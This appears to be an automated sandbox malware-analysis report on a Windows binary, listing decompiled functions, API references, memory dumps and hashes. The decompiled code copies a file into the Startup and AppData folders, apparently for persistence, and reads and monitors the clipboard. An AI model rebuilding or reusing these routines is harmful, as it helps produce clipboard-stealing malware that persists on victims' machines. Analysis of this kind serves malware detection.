Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: ae4cf808094939d96a8c8ebfb7bc7c2a037b9b939bedb30dbf4cd61d5d842788
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: E9D0123268522CB7DB002A94DC09BCEBB1C9F05BA6F148021FF0DE9181CBB49A4146EA

Uniqueness

Uniqueness Score: -1.00%

Function 004038A6, Relevance: 1.6, APIs: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E004038A6(void* __ecx) {
				intOrPtr _v20;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				char _v56;
				char _v576;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t18;
				void* _t22;
				intOrPtr _t28;
				void* _t33;
				char* _t39;
				char* _t41;
				void* _t42;
				void* _t44;
				intOrPtr _t45;

				_t18 =  &_v32;
				_t42 = __ecx;
				_t33 = 0;
				 *_t18 = _t45;
				 *((intOrPtr*)(_t18 + 0xc)) = 0xffffffff;
				 *((intOrPtr*)(_t18 + 8)) = 0x403df0;
				 *((intOrPtr*)(_t18 + 4)) =  *[fs:0x0];
				 *[fs:0x0] = _t18 + 4;
				if( *((intOrPtr*)(__ecx + 0x14)) == 0) {
					_t39 =  &_v576;
					_t22 = E0040BB50(_t39, _t39, 0, 0x208);
					__imp__SHGetSpecialFolderPathW(0, _t39, 7, 0); // executed
					if(_t22 != 0) {
						_t43 = _t42 + 4;
						E00402E56(E0040D54B( &_v576), _t42 + 4, _t44,  &_v576, _t25);
						_t41 =  &_v56;
						E00403C9E(_t41);
						_t28 =  *((intOrPtr*)(_t41 + 0x10));
						if( *((intOrPtr*)(_t41 + 0x14)) > 7) {
							_t41 = _v56;
						}
						_v20 = 0;
						E00402F5E(_t28, _t43, _t41, _t28);
						_t30 = _v36;
						if(_v36 >= 8) {
							E00401E5D(_t33, _t41, _v56, _t30 + _t30 + 2);
						}
						_t33 = 1;
					}
				}
				 *[fs:0x0] = _v28;
				return _t33;
			}

0x004038b2
0x004038b5
0x004038bc
0x004038be
0x004038c0
0x004038c7
0x004038d5
0x004038da
0x004038e4
0x004038ea
0x004038f7
0x00403904
0x0040390c
0x00403913
0x0040392a
0x0040392f
0x00403933
0x00403938
0x0040393f
0x00403941
0x00403941
0x00403944
0x0040394f
0x00403954
0x0040395a
0x00403964
0x00403969
0x0040396c
0x0040396c
0x0040390c
0x00403971
0x00403983

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,?,00000007,00000000), ref: 00403904

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: FolderPathSpecial
String ID:
API String ID: 994120019-0
Opcode ID: 58476f73d54a83401aee4e83aaf33d7ab281e9faa3c469b91043260517d35c95
Instruction ID: 0027f6d6cea7643401164dbe0334a0c7b953626e7c11481af6f4a6a46a3fdd5b
Opcode Fuzzy Hash: 58476f73d54a83401aee4e83aaf33d7ab281e9faa3c469b91043260517d35c95
Instruction Fuzzy Hash: 3721AFB1900204AFD720AF65DC89BAABBBDEB45714F01413AF804B7381D77CAA04CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040273A, Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040273A(void* __ecx) {
				intOrPtr _v20;
				char _v28;
				intOrPtr _v36;
				char _v56;
				char _v576;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t17;
				void* _t20;
				intOrPtr _t24;
				void* _t29;
				char* _t34;
				short* _t35;
				void* _t36;
				void* _t38;
				intOrPtr _t39;

				_t17 =  &_v28;
				_t36 = __ecx;
				_t29 = 0;
				 *((intOrPtr*)(_t17 - 4)) = _t39;
				 *((intOrPtr*)(_t17 + 8)) = 0xffffffff;
				 *((intOrPtr*)(_t17 + 4)) = 0x402d60;
				 *_t17 =  *[fs:0x0];
				 *[fs:0x0] = _t17;
				if( *((intOrPtr*)(__ecx + 0x2c)) == 0) {
					_t34 =  &_v576;
					_t20 = E0040BB50(_t34, _t34, 0, 0x208);
					__imp__SHGetSpecialFolderPathW(0, _t34, 0x1a, 0); // executed
					if(_t20 != 0) {
						_t37 = _t36 + 0x1c;
						E00402E56(E0040D54B(_t34), _t36 + 0x1c, _t38, _t34, _t21);
						_t35 =  &_v56;
						E00402BB2(_t35);
						_t24 =  *((intOrPtr*)(_t35 + 0x10));
						if( *((intOrPtr*)(_t35 + 0x14)) > 7) {
							_t35 = _v56;
						}
						_v20 = 0;
						E00402F5E(_t24, _t37, _t35, _t24);
						_t26 = _v36;
						if(_v36 >= 8) {
							E00401E5D(_t29, _t35, _v56, _t26 + _t26 + 2);
						}
						_t29 = 1;
					}
				}
				 *[fs:0x0] = _v28;
				return _t29;
			}

0x00402746
0x00402749
0x0040274b
0x0040274d
0x00402750
0x00402757
0x00402765
0x00402767
0x00402771
0x00402773
0x00402780
0x0040278d
0x00402795
0x00402797
0x004027a7
0x004027ac
0x004027b0
0x004027b5
0x004027bc
0x004027be
0x004027be
0x004027c1
0x004027cc
0x004027d1
0x004027d7
0x004027e1
0x004027e6
0x004027e9
0x004027e9
0x00402795
0x004027ee
0x00402800

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 0040278D

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: FolderPathSpecial
String ID:
API String ID: 994120019-0
Opcode ID: eab451f36c1a89431072b9e9d5d0ba8a6219ea72b88b558cc7c23620958e0ae2
Instruction ID: cd1f7dcc2b6491412fad83079e37933c380d03bb048942fc38d902c39c6b5bf8
Opcode Fuzzy Hash: eab451f36c1a89431072b9e9d5d0ba8a6219ea72b88b558cc7c23620958e0ae2
Instruction Fuzzy Hash: C021AEB1900204AFC710AF55DD89BAFBBB9FB45B14F00413AF804672C1C378A9048AA5

Uniqueness

Uniqueness Score: -1.00%

Function 004029E4, Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004029E4(void* __ecx) {
				intOrPtr _v20;
				char _v28;
				intOrPtr _v36;
				intOrPtr _v40;
				WCHAR* _v56;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t19;
				void* _t22;
				WCHAR* _t28;
				int _t29;
				intOrPtr _t30;
				short* _t35;
				intOrPtr _t38;

				_t19 =  &_v28;
				_t30 = 0;
				 *((intOrPtr*)(_t19 - 4)) = _t38;
				 *((intOrPtr*)(_t19 + 8)) = 0xffffffff;
				 *((intOrPtr*)(_t19 + 4)) = 0x402d80;
				 *_t19 =  *[fs:0x0];
				 *[fs:0x0] = _t19;
				if( *((intOrPtr*)(__ecx + 0x2c)) == 0) {
					L10:
					 *[fs:0x0] = _v28;
					return _t30;
				}
				_t22 = E00402DAA(__ecx + 0x1c, 0x5c, 0xffffffff);
				_t35 =  &_v56;
				 *((intOrPtr*)(_t35 + 0x10)) = 0;
				 *((intOrPtr*)(_t35 + 0x14)) = 7;
				 *_t35 = 0;
				E004030E8(_t35, __ecx + 0x1c, 0, _t22);
				_v20 = 0;
				if(E00402C4E(_t35, _t35) != 0) {
					L6:
					_t30 = 1;
					L8:
					_t25 = _v36;
					if(_v36 >= 8) {
						E00401E5D(_t30, _t35, _v56, _t25 + _t25 + 2);
					}
					goto L10;
				}
				if(_v40 == 0) {
					L7:
					_t30 = 0;
					goto L8;
				}
				_t28 =  &_v56;
				if(_v36 > 7) {
					_t28 = _v56;
				}
				_t29 = CreateDirectoryW(_t28, 0); // executed
				if(_t29 == 0) {
					goto L7;
				} else {
					goto L6;
				}
			}

0x004029ed
0x004029f2
0x004029f4
0x004029f7
0x004029fe
0x00402a0c
0x00402a0e
0x00402a18
0x00402a8e
0x00402a91
0x00402aa0
0x00402aa0
0x00402a23
0x00402a28
0x00402a2b
0x00402a2e
0x00402a35
0x00402a3f
0x00402a44
0x00402a4f
0x00402a70
0x00402a70
0x00402a76
0x00402a76
0x00402a7c
0x00402a86
0x00402a8b
0x00000000
0x00402a7c
0x00402a55
0x00402a74
0x00402a74
0x00000000
0x00402a74
0x00402a5b
0x00402a5e
0x00402a60
0x00402a60
0x00402a66
0x00402a6e
0x00000000
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00402C4E: GetFileAttributesW.KERNELBASE(000000FF,00402A4D,?,?,00000000,00000000,0000005C,000000FF), ref: 00402C61

CreateDirectoryW.KERNELBASE(00000000,00000000,?,?,00000000,00000000,0000005C,000000FF), ref: 00402A66

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: c5de3c09caf578e628e457591c012e9100801fa811d3c31503a2895796b42eae
Instruction ID: 6803f4355f00bd10b22d67a76308e827c8943c7b3f15f889b887db4fd76a99eb
Opcode Fuzzy Hash: c5de3c09caf578e628e457591c012e9100801fa811d3c31503a2895796b42eae
Instruction Fuzzy Hash: 46216F71A01604AFDB24DF55DE89BAEBBB9FB05714F00423AE804B72D0D7B85D04CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00402AC6, Relevance: 1.5, APIs: 1, Instructions: 21
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402AC6(void* __ecx) {
				WCHAR* _t10;
				signed int _t11;
				void* _t13;
				WCHAR* _t14;

				_t13 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x14)) == 0 ||  *((intOrPtr*)(__ecx + 0x2c)) == 0) {
					return 0;
				} else {
					_t10 = __ecx + 4;
					_t14 = __ecx + 0x1c;
					if( *((intOrPtr*)(__ecx + 0x30)) >= 8) {
						_t14 =  *_t14;
					}
					if( *((intOrPtr*)(_t13 + 0x18)) >= 8) {
						_t10 =  *_t10;
					}
					_t11 = CopyFileW(_t10, _t14, 0); // executed
					return _t11 & 0xffffff00 | _t11 != 0x00000000;
				}
			}

0x00402ac6
0x00402aca
0x00402afa
0x00402ad2
0x00402ad6
0x00402ad9
0x00402adc
0x00402ade
0x00402ade
0x00402ae4
0x00402ae6
0x00402ae6
0x00402aec
0x00402af7
0x00402af7

APIs

CopyFileW.KERNELBASE(?,?,00000000), ref: 00402AEC

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 2ebdcac8c8a523f304490066e6ddf2fda296340b0d9077f4565a5a987837848f
Instruction ID: 62e1dcfbb33266463a7ead9b70af93dcb77a4cbea681cd5fc91aeea03ebd9f56
Opcode Fuzzy Hash: 2ebdcac8c8a523f304490066e6ddf2fda296340b0d9077f4565a5a987837848f
Instruction Fuzzy Hash: 2CE0E530300201DFDE648E24CA4C75237A5BB4234AF2485BDA0049E0D1CBBDD887EF98

Uniqueness

Uniqueness Score: -1.00%

Function 00402C4E, Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C4E(signed int __ecx, WCHAR* _a4) {
				WCHAR* _t6;
				signed int _t8;
				signed int _t12;

				_t12 = __ecx;
				_t6 = _a4;
				if(_t6[8] == 0) {
					return 0;
				} else {
					if(_t6[0xa] > 7) {
						_t6 =  *_t6;
					}
					_t8 = GetFileAttributesW(_t6); // executed
					return (_t8 & 0x00000010) >> 0x00000004 & (_t12 & 0xffffff00 | _t8 != 0xffffffff);
				}
			}

0x00402c4e
0x00402c4e
0x00402c56
0x00402c7a
0x00402c58
0x00402c5c
0x00402c5e
0x00402c5e
0x00402c61
0x00402c75
0x00402c75

APIs

GetFileAttributesW.KERNELBASE(000000FF,00402A4D,?,?,00000000,00000000,0000005C,000000FF), ref: 00402C61

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 56448a20b99bd57373c00863e09f6f8ebf97fe29b40f550f1e5c030904f4788d
Instruction ID: a4e8ac05d14534e49ae100b9e6b661d522ff1b75acded25c46ccd44f0cc4fd00
Opcode Fuzzy Hash: 56448a20b99bd57373c00863e09f6f8ebf97fe29b40f550f1e5c030904f4788d
Instruction Fuzzy Hash: 8CD05EB25142009FE3148A38CA8DA4F73A0FB51351F108F72E120E71E0C778C940D658

Uniqueness

Uniqueness Score: -1.00%

Function 03F50920, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000), ref: 03F50929

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 7ba80916a48acbfb0f046a5eb73e9b1892c8f9a247d3f52fd2d0df5884ae7060
Instruction ID: c0089d607f9342f2c15a261cd068abafb40f64debc35d3030ca853ef88393cfd
Opcode Fuzzy Hash: 7ba80916a48acbfb0f046a5eb73e9b1892c8f9a247d3f52fd2d0df5884ae7060
Instruction Fuzzy Hash: 879004F07441F051DC3035DC0C01F4500111741775F7037107130FF1D4DF4455000115

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004017BA, Relevance: 6.1, APIs: 4, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E004017BA(intOrPtr __ecx, struct HINSTANCE__* _a4, WCHAR* _a8, WCHAR* _a12) {
				intOrPtr _v20;
				char _v28;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v60;
				intOrPtr _v64;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t29;
				WCHAR* _t33;
				struct HRSRC__* _t34;
				void* _t35;
				void* _t36;
				long _t37;
				intOrPtr _t39;
				void* _t40;
				struct HINSTANCE__* _t50;
				WCHAR* _t53;
				char* _t54;
				char* _t55;
				struct HRSRC__* _t61;
				intOrPtr _t62;
				void* _t63;

				_t29 =  &_v28;
				_t50 = _a4;
				_v36 = __ecx;
				 *((intOrPtr*)(_t29 - 4)) = _t62;
				 *((intOrPtr*)(_t29 + 8)) = 0xffffffff;
				 *((intOrPtr*)(_t29 + 4)) = 0x401b90;
				 *_t29 =  *[fs:0x0];
				 *[fs:0x0] = _t29;
				if(_t50 == 0) {
					L13:
					 *[fs:0x0] = _v28;
					return 1;
				}
				_t33 = _a8;
				if(_t33 == 0) {
					goto L13;
				}
				_t53 = _a12;
				if(_t53 == 0) {
					goto L13;
				}
				_t34 = FindResourceW(_t50, _t53, _t33);
				if(_t34 == 0) {
					goto L13;
				}
				_t61 = _t34;
				_t35 = LoadResource(_t50, _t34);
				if(_t35 == 0) {
					goto L13;
				}
				_t36 = LockResource(_t35);
				_t60 = _t36;
				_t37 = SizeofResource(_t50, _t61);
				if(_t36 == 0) {
					goto L13;
				}
				_t54 =  &_v60;
				 *((intOrPtr*)(_t54 + 0x10)) = 0;
				 *((intOrPtr*)(_t54 + 0x14)) = 0xf;
				 *_t54 = 0;
				_v20 = 0;
				E00401BCA(_t37, _t54, _t60, _t37);
				_t39 = _v44;
				_t55 =  &_v60;
				if(_v40 > 0xf) {
					_t55 = _v60;
				}
				_t40 = E00409A7B(_t55, _t39);
				_t63 = _t62 + 8;
				if(_t40 != 0) {
					E00401940( &_v84,  &_v60);
					_v20 = 1;
					_push( &_v84);
					E00406B56();
					_t47 = _v64;
					if(_v64 >= 8) {
						E00401E5D(_t50, _t60, _v84, _t47 + _t47 + 2);
						_t63 = _t63 + 8;
					}
				}
				_t41 = _v40;
				if(_v40 >= 0x10) {
					E00401E5D(_t50, _t60, _v60, _t41 + 1);
				}
				goto L13;
			}

0x004017c3
0x004017c6
0x004017c9
0x004017cc
0x004017cf
0x004017d6
0x004017e6
0x004017e8
0x004017ee
0x004018cf
0x004018d2
0x004018e2
0x004018e2
0x004017f4
0x004017f9
0x00000000
0x00000000
0x004017ff
0x00401804
0x00000000
0x00000000
0x0040180d
0x00401815
0x00000000
0x00000000
0x0040181b
0x0040181f
0x00401827
0x00000000
0x00000000
0x0040182e
0x00401834
0x00401838
0x00401840
0x00000000
0x00000000
0x00401848
0x0040184b
0x0040184e
0x00401855
0x00401858
0x0040185d
0x00401862
0x00401869
0x0040186c
0x0040186e
0x0040186e
0x00401873
0x00401878
0x0040187d
0x00401887
0x00401892
0x0040189c
0x0040189d
0x004018a2
0x004018a8
0x004018b2
0x004018b7
0x004018b7
0x004018a8
0x004018ba
0x004018c0
0x004018c7
0x004018cc
0x00000000

APIs

FindResourceW.KERNEL32(?,?,?), ref: 0040180D
LoadResource.KERNEL32(?,00000000), ref: 0040181F
LockResource.KERNEL32(00000000), ref: 0040182E
SizeofResource.KERNEL32(?,00000000), ref: 00401838

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 85b7b28458e1394bcd7052967b372fa113e0870b11f833f67afc80ba09f53bcd
Instruction ID: 2cabdca39d3262402d1047bbe99648c09c519856ad88f623130be37e53c6236b
Opcode Fuzzy Hash: 85b7b28458e1394bcd7052967b372fa113e0870b11f833f67afc80ba09f53bcd
Instruction Fuzzy Hash: DB315EB29002449FEB14EFA5DC44EBFBBBAFB44310F048439F901A72A1E739D904CA64

Uniqueness

Uniqueness Score: -1.00%

Function 03F59946, Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 03F59963
SetWindowLongW.USER32(?,000000EB,?), ref: 03F5996D
GetLastError.KERNEL32 ref: 03F5997B
GetWindowLongW.USER32(?,000000EB), ref: 03F5998E

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: ErrorLastLongWindow
String ID:
API String ID: 3631197057-0
Opcode ID: f8c5ca6ca7a7c4e52703b7f9610465da3e9b1b0db8f76d8ff76d58eaace230f7
Instruction ID: e4f8d3d3ab1566fe81b5586f08601c1fe393b2518e9d41660049e2f3d5d2662b
Opcode Fuzzy Hash: f8c5ca6ca7a7c4e52703b7f9610465da3e9b1b0db8f76d8ff76d58eaace230f7
Instruction Fuzzy Hash: B8012636A0C225EFDB049B24AC04D7B77ADEBC5566B084579FE42D3190C31188008676

Uniqueness

Uniqueness Score: -1.00%

Function 00409086, Relevance: 6.0, APIs: 4, Instructions: 41
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409086(intOrPtr _a4) {
				void* _t6;
				void* _t8;
				unsigned int _t9;
				signed int _t11;
				void* _t13;
				intOrPtr _t14;
				signed int _t15;
				void* _t16;
				void* _t17;
				void* _t18;

				_t6 = GetClipboardData(0xd);
				if(_t6 == 0) {
					L8:
					_t13 = 0;
				} else {
					_t17 = _t6;
					_t8 = GlobalLock(_t6);
					if(_t8 == 0) {
						goto L8;
					} else {
						_t16 = _t8;
						_t9 = GlobalSize(_t17);
						if(_t9 == 0) {
							L9:
							_t13 = 0;
						} else {
							_t11 = _t9 >> 1;
							if(_t11 == 0) {
								goto L9;
							} else {
								_t14 = _a4;
								while(1) {
									_t15 = _t11;
									if(_t11 == 0) {
										break;
									}
									_t5 = _t15 - 1; // -1
									_t11 = _t5;
									if( *((short*)(_t16 + _t15 * 2 - 2)) == 0) {
										continue;
									}
									break;
								}
								E00402E56(_t11, _t14, _t18, _t16, _t15);
								_t13 = 1;
							}
						}
						GlobalUnlock(_t17);
					}
				}
				return _t13;
			}

0x0040908b
0x00409093
0x004090d3
0x004090d3
0x00409095
0x00409095
0x00409098
0x004090a0
0x00000000
0x004090a2
0x004090a2
0x004090a5
0x004090ad
0x004090d7
0x004090d7
0x004090af
0x004090af
0x004090b1
0x00000000
0x004090b3
0x004090b3
0x004090b7
0x004090b7
0x004090bb
0x00000000
0x00000000
0x004090c3
0x004090c3
0x004090c6
0x00000000
0x00000000
0x00000000
0x004090c6
0x004090ca
0x004090cf
0x004090cf
0x004090b1
0x004090da
0x004090da
0x004090a0
0x004090e5

APIs

GetClipboardData.USER32 ref: 0040908B
GlobalLock.KERNEL32 ref: 00409098
GlobalSize.KERNEL32(00000000), ref: 004090A5
GlobalUnlock.KERNEL32(00000000,?,?,00000000,00408FB5,?), ref: 004090DA

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Global$ClipboardDataLockSizeUnlock
String ID:
API String ID: 3307496287-0
Opcode ID: f826cbb9f2a219faf9c08d78c157462fb47ce50f780058548b3d01393191027e
Instruction ID: dc034b8fa6578784a8c7064091bbab083a3b5872c17dd52d33707213b887c75e
Opcode Fuzzy Hash: f826cbb9f2a219faf9c08d78c157462fb47ce50f780058548b3d01393191027e
Instruction Fuzzy Hash: 17F01D7130A6165BE3105B619C88BBB767CAB82755B08813AE901E23C1DB79CC05D2BA

Uniqueness

Uniqueness Score: -1.00%

Function 0040D33E, Relevance: 4.6, APIs: 3, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040D33E(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x4228e8; // 0xfc126c15
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E0040A39E(_t41);
					_pop(_t62);
				}
				E0040BB50(_t67,  &_v804, 0, 0x50);
				E0040BB50(_t67,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t25 =  &_v0; // 0x4
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // -808
				if(UnhandledExceptionFilter(_t36) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E0040A39E(_t57);
				}
				return E0040A627(_v8 ^ _t70);
			}

0x0040d33e
0x0040d33e
0x0040d33e
0x0040d33e
0x0040d349
0x0040d34e
0x0040d350
0x0040d358
0x0040d35a
0x0040d35d
0x0040d362
0x0040d362
0x0040d36e
0x0040d381
0x0040d38f
0x0040d395
0x0040d39b
0x0040d3a1
0x0040d3a7
0x0040d3ad
0x0040d3b3
0x0040d3b9
0x0040d3bf
0x0040d3c5
0x0040d3cc
0x0040d3d3
0x0040d3da
0x0040d3e1
0x0040d3e8
0x0040d3ef
0x0040d3f0
0x0040d3f9
0x0040d3ff
0x0040d3ff
0x0040d402
0x0040d408
0x0040d415
0x0040d41e
0x0040d427
0x0040d430
0x0040d43e
0x0040d440
0x0040d446
0x0040d455
0x0040d461
0x0040d464
0x0040d469
0x0040d476

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0040A85B), ref: 0040D436
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0040A85B), ref: 0040D440
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0040A85B), ref: 0040D44D

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 165be32f6c98900053fb85ef1d06d1dc44f17f9cd40b7697e97a256599aee75e
Instruction ID: c19815d09265bcacc34677eb3d853154b615e1374fc23d5d052c58aaf82e9ac5
Opcode Fuzzy Hash: 165be32f6c98900053fb85ef1d06d1dc44f17f9cd40b7697e97a256599aee75e
Instruction Fuzzy Hash: 9A31B574901328ABCB21DF65DD8978DB7B4BF18310F5041EAE80CA7290E7749B858F49

Uniqueness

Uniqueness Score: -1.00%

Function 03F5D58E, Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,03F5AAAB), ref: 03F5D686
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,03F5AAAB), ref: 03F5D690
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,03F5AAAB), ref: 03F5D69D

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 165be32f6c98900053fb85ef1d06d1dc44f17f9cd40b7697e97a256599aee75e
Instruction ID: ee53f682fa771f88427e0b2f379774e3cf30c98bacd6533bcc46fba5651ee51e
Opcode Fuzzy Hash: 165be32f6c98900053fb85ef1d06d1dc44f17f9cd40b7697e97a256599aee75e
Instruction Fuzzy Hash: 1C319374942229ABCB61DF64DD88BCDBBB8BF18310F5041EAF91CA7250E7709B858F44

Uniqueness

Uniqueness Score: -1.00%

Function 00409436, Relevance: 4.5, APIs: 3, Instructions: 38
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00409436(void* __ecx) {
				void* _t14;

				_t4 =  *(__ecx + 0x14);
				_t14 = __ecx;
				if(_t4 == 0) {
					L7:
					if(E004095FE(_t4, _t14) == 0 || E00409630(_t5, _t14) != 0) {
						return 1;
					} else {
						L10:
						return 0;
					}
				}
				if(IsWindow(_t4) == 0) {
					L4:
					_t4 =  *(_t14 + 0x14);
					if(_t4 == 0 || _t4 == 0 || E004095C0(_t14) != 0) {
						goto L7;
					} else {
						goto L10;
					}
				}
				_t4 =  *(_t14 + 0x14);
				if(_t4 == 0) {
					goto L7;
				}
				__imp__RemoveClipboardFormatListener(_t4);
				goto L4;
			}

0x00409437
0x0040943a
0x0040943e
0x00409476
0x0040947f
0x00000000
0x00409490
0x00409490
0x00000000
0x00409490
0x0040947f
0x00409449
0x00409459
0x00409459
0x0040945e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040945e
0x0040944b
0x00409450
0x00000000
0x00000000
0x00409453
0x00000000

APIs

IsWindow.USER32(?), ref: 00409441
RemoveClipboardFormatListener.USER32(?,?,?,?,00000000,?,?,0040995B,?,?,?,00000000,?,?,004014D8), ref: 00409453
IsWindow.USER32(?), ref: 00409461

Memory Dump Source

Source File: 00000010.00000002.392640756.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Window$ClipboardFormatListenerRemove
String ID:
API String ID: 3719886409-0
Opcode ID: aa2bbedaa9be361bff5a662aac4877ddbac9056f0291a1e568fa5f7ae37bf4d5
Instruction ID: cb301b195c2d44fc75319e9f390df8f1b16e1320be900dea725fe8e67ba00e2b
Opcode Fuzzy Hash: aa2bbedaa9be361bff5a662aac4877ddbac9056f0291a1e568fa5f7ae37bf4d5
Instruction Fuzzy Hash: A1F0B77070861156DE24AE76A904A6B63A95B01A94309847EA842F73C7EA3DCC0786AE

Uniqueness

Uniqueness Score: -1.00%

Function 03F59686, Relevance: 4.5, APIs: 3, Instructions: 38clipboardCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 03F59691
RemoveClipboardFormatListener.USER32(?), ref: 03F596A3
IsWindow.USER32(?), ref: 03F596B1

Memory Dump Source

Source File: 00000010.00000002.393907435.0000000003F50000.00000040.00000001.sdmp, Offset: 03F50000, based on PE: false

Similarity

API ID: Window$ClipboardFormatListenerRemove
String ID:
API String ID: 3719886409-0
Opcode ID: aa2bbedaa9be361bff5a662aac4877ddbac9056f0291a1e568fa5f7ae37bf4d5
Instruction ID: e0b44165e22d5257f0f50b96533e12ce18598db319d91caf2771068ce800dd7b
Opcode Fuzzy Hash: aa2bbedaa9be361bff5a662aac4877ddbac9056f0291a1e568fa5f7ae37bf4d5
Instruction Fuzzy Hash: 88F0FE34B05713D75E3CDF36AD146ABA3A95E4198130C4468BE01DB390DB95C40AC6BD

